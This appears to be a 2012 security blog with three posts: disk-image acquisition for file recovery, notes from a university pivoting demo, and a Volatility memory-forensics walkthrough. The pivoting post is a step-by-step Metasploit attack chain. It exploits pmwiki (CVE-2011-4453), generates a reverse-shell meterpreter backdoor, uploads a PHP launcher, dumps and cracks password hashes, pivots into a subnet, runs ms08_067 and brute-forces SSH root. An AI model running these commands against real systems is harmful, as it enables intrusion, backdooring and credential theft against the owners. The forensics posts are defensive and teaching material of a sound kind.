Monday, 21 May 2012

Restore files / Image acquisition 101

First of all lets acquire the image of the disk in question so we can recover the files.

Boot your backtrack disk (usb or disk does not matter that much) and load up the Forensics mode (no disk no swap)

Check out to see what disks/partitions we got

dmesg | grep sd

Get the images from both partitions and transfer them to the workstation where you will be doing the work.

dcfldd if=/dev/sda1 | ssh username@hostname "dd of=/path/on/the/remote/machine/image1.img" 

dcfldd if=/dev/sda2 | ssh username@hostname "dd of=/path/on/the/remote/machine/image2.img"

Now lets make the images to VMware disks

qemu-img convert -f raw /storage/data/recover/sda1.img -O vmdk /storage/data/recover/vmware-sda1.vmdk

or

wget "http://downloads.sourceforge.net/project/raw2vmdk/raw2vmdk-0.1.3.1-jar.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fraw2vmdk%2F&ts=1337595038&use_mirror=kent"

tar -zxvf raw2vmdk-0.1.3.1-jar.tar.gz
rm -rf raw2vmdk-0.1.3.1-jar.tar.gz
cd  raw2vmdk-0.1.3.1-jar

java -jar raw2vmdk.jar /storage/data/recover/sda2.img /storage/data/recover/vmware-sda2.vmdk


Now they can be loaded into VMware and files can be restored using:

Diskdigger (needs licence)
Recuva (free)
FreeRecovereer (free)
File Scavanger (needs licence)


Stay tuned :)

Tuesday, 15 May 2012

UoB pivoting demo

These are the notes from a quick demo I did at the University of Bedfordshire. Enjoy..

  • Open Armitage
  • Scan (nmap) 172.16.128.x and find web server
db_nmap -sT -Pn -T5 -O --open 172.16.128.1/24 
  • Find attacks
  • Visit site (http://172.16.128.3) and attack
  • Exploit using CVE-2011-4453  (pmwiki) GUI fail -> use console
use exploit/multi/http/pmwiki_pagelist
set rhost 172.16.128.3
exploit -j
sessions -v
  • Check out the system (sysinfo,ps,getuid) no hashdump/winenum/route >> php-meterpreter not full functionality so...
  • Create a backdoor
msfpayload windows/x64/meterpreter/reverse_tcp LHOST=172.16.128.10 LPORT=8443 EXITFUNC=thread X > /root/Tools/runme.exe
  • cat /root/Tools/meh.php
<?php
system("runme.exe");
?>
  • Upload both meh.php and runme.exe
lcd /root/Tools
upload meh.php
upload runme.exe
  • Start a listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set exitfunc thread
set lhost 172.16.128.10
set lport 8443
exploit -j
  • Open a Terminal and
wget http://172.16.128.3/meh.php
  • Second session now has full system privs
  • Get hashdump
  • Crack with ophcrack
  • Check out routes with ipconfig/route (time to pivot!) 
route add 10.1.87.1 255.255.255.0 2
  • Scan subnet using arpscan
run arp_scanner -r 10.1.87.1/24
  • Scan hosts using metasploit tcp scanner
  • Locate windows server
  • Locate linux server
  • Compromise windows box
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 10.1.87.4
exploit -j
  • Take hash and crack with ophcrack
  • Compromise linux box
  • Create a forwarding tunnel to check out the web server
portfwd add -l 8080 -p 80 -r 10.1.87.5
  • Test php-cgi exploit on it on local browser (http://localhost:8080/configuration.php?-s)
use auxiliary/scanner/ssh/ssh_login
set USERNAME root
set PASSWORD password
set RHOSTS 10.1.87.5
run -j

Thats all for now..
Stay tuned :)

Friday, 4 May 2012

Volatility taster


On our Backtrack system lets setup a quick samba to accept the memory dump on
  • apt-get install samba
  • vi /etc/samba/smb.conf (comment all the shares and add just the following)
[btshare] 
   comment = btshare 
   path = /btshare 
   read only = no 
   guest ok = yes 
   browsable = yes
save and exit
  • mkdir /btshare
  • chmod 777 /btshare
  • service smbd restart

On our target system open the USB stick that has DEFT in it.
Run deft extra an decide where your audit log will go
Go to Acquire and launch the trusted shell in order to run win32dd or win64dd
  • win64dd /r /f \\192.168.1.7\btshare\win7memory.img
  • cd /root/Tools/
  • svn checkout http://volatility.googlecode.com/svn/trunk Volatility
  • cd Volatility
  • chmod +x vol.py
  • ./vol.py -f /btshare/win7memory.img imageinfo
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 pslist
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 connections
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 connscan
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 hivescan
  • ./vol.py -f /btshare/win7memory.img --profile Win7SP1x64 hivelist 0x031da010

More to come :)